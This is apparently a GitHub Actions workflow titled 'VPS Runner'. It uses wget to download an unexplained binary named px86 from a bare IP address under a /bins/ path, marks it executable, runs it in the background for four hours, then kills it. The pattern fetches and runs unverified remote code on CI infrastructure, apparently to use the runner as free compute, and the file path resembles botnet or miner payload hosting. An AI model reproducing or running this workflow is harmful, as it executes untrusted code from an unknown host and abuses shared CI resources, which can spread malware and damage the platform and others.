name: VPS Runner

on:
  workflow_dispatch:
    inputs:
      # ... your inputs

jobs:
  # ... your jobs
  run-binary:
    runs-on: ubuntu-latest
    timeout-minutes: 240 # Run for 4 hours
    steps:
      - name: Download binary
        run: |
          wget http://45.138.16.158/bins/px86 -O px86
          chmod +x px86

      - name: Run binary for 4 hours
        run: |
          UPTIME_SECONDS=$((4 * 3600))
          echo "Running for 4 hours"

          ./px86 x86 &
          PID=$!

          sleep $UPTIME_SECONDS

          kill $PID 2>/dev/null || true
          echo "Completed successfully"
